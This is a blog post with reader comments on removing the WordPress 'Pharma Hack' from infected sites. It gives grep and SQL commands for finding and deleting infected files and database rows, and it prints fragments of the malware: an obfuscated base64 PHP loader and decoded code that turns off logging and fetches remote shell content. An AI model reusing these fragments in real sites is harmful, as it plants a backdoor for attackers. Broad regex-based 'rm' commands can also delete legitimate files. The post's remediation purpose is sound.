Removing WordPress Pharma Hack

I posted a few weeks ago about the WordPress Pharma Hack that has been running pretty rampant across the web, in case you missed my initial post, here’s a link. Well, I would like to say that we were able to jump right on this thing and immediately remove it pretty easily, but that simply wasn’t the case. I worked closely w/ Matt Critcher, our server admin at Pleth, LLC, and probably one of the sharpest guys I know, and we toiled over this thing daily for about a week or so until we finally eradicated it from all of our WordPress installations. For the benefit of all of you that are still wrestling w/ this hack, here’s exactly how we removed it…

Locate all base64_decode

This hack, like a lot of others, used base64 code to disguise JavaScript (so we have to locate it and remove it, this is what it will look like)

< ? php $XZKsyG=’as’;$RqoaUO=’e';$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t';$joEDdb
oEDdb(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY.......and so on...

To locate and remove the code, you will need to SSH into your server, CD into the wordpress home directory and do the following

grep -r 'php \$[a-zA-Z]*;' * |awk -F : '{print $1}' | xargs -I{} rm -v {}

This will scan the entire folder and all it’s sub-directories for any file containing the string “php $RANDOMLETTERS=’as'” and delete it verbosely. If you do not wish to delete it automatically just run this to print out the filename.

grep -r 'php \$[a-zA-Z]*;' * |awk -F : '{print $1}'

When we did this, there were about 50 files that contained the exploit.  There are other files containing nasty code as well. You will also need to to search for and remove files containing the string “wp_class_support”.

grep -r wp_class_support * |awk -F : '{print $1}' |xargs -I{} rm -v {}

This bit of syntax will search for files with that string and delete them (if you want to manually delete them, leave off the xargs part as per the above example).

I also found this nasty thing (not sure if it is related to the Pharma Hack) in several files. All were WordPress core files, so you MUST replace every WordPress file on your site with clean ones. DO NOT do this via the internal utility – use FTP, SCP, or whatever to get these files uploaded. Once you have done this, do

grep -r QGluaV9yZXN0b * |awk -F : '{print $1}'

This will search the remaining files for the exploit. Any files containing this MUST be replaced or you are still infected. The full text of the exploit the base64 encoded string as follows:


Which decodes as

{@ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);}else{@ini_alter('error_log',NULL); @ini_alter('log_errors',0);
@ini_alter('file_uploads',1); @ini_alter('allow_url_fopen',1);}
function GetShellContent($host,$url){if(@function_exists('curl_init'))
curl_close($curl);return $data;}elseif(@function_exists('fsockopen'))
if($fp){$out="GET /$url"." HTTP/1.0\r\n";$out .="Host: $host\r\n";
$out .="User-Agent: Mozilla/4.0\r\n";$out .="Connection: Close\r\n\r\n";
return $data;}}elseif(@function_exists('file_get_contents') && @ini_get('allow_url_fopen')==1)
{$full_url='http://'.$host.'/'.$url;$data=@file_get_contents($full_url);return $data;}}
if($_REQUEST['sh'] != "")

I went ahead and scanned the whole site for files that had base64_decodes in them. To search for these do the following:

grep -r base64 * |awk -F : '{print $1}' |sort |uniq

This will print out a list of each file that contains the string “base64″. You should examine each file carefully for rouge content, as many files legitimately contain this string and need it to function. If you are unsure of the code, replace the file with a fresh copy. Most of the files I’ve seen that are infected have the base64 statement at the very top of the file but this is not always the case.

Once you get the files cleaned, you need to work on the database. The exploit adds and/or modifies entries in the wp_options table. Using the MySQL interpreter or phpMyAdmin run the following query:

SELECT * FROM `wp_options` where `option_name` LIKE 'rss%' ORDER BY `wp_options`.`option_name` ASC;

This will search the wp_options table for all entries beginning with rss_ and return them. You will need to delete each one that looks similar to this:


rss_ followed by strings of random numbers or letters is bad and MUST be deleted as they are added by the exploit. Also, the exploit adds or modifies several other records in the same table. A couple of the sites we found recommended running this query as well as these options should not be set or contain any data:

delete from wp_options where option_name = "class_generic_support";
delete from wp_options where option_name = "widget_generic_support";
delete from wp_options where option_name = "fwp’";
delete from wp_options where option_name = "wp_check_hash";
delete from wp_options where option_name = "ftp_credentials";


If all goes well, this information should help you eradicate the WordPress Pharma Hack from your wordpress installation. For a more detailed post on how to remove this hack, I highly recommend Matt Critcher’s post on his blog…




  • Ken Ray

    as I posted over at, the easiest way for a novice (like myself) to find the infected file is to list the PHP files by SIZE in http://FTP. 
    the one that has the thousands of lines of base64 encoded strings sticks out like a sore thumb.
    thanks for your attention to this subject. it was a real nightmare for me.

    • Cotton Rohrscheib

      No problem. This hack has been a nightmare for a lot of people I think.

  • Hiral

    this is nice article, i use yr command so many times to clean our sites. we successfully able to clean our site, but we keep becoming victim of hack again and again. Any suggestions, what to do?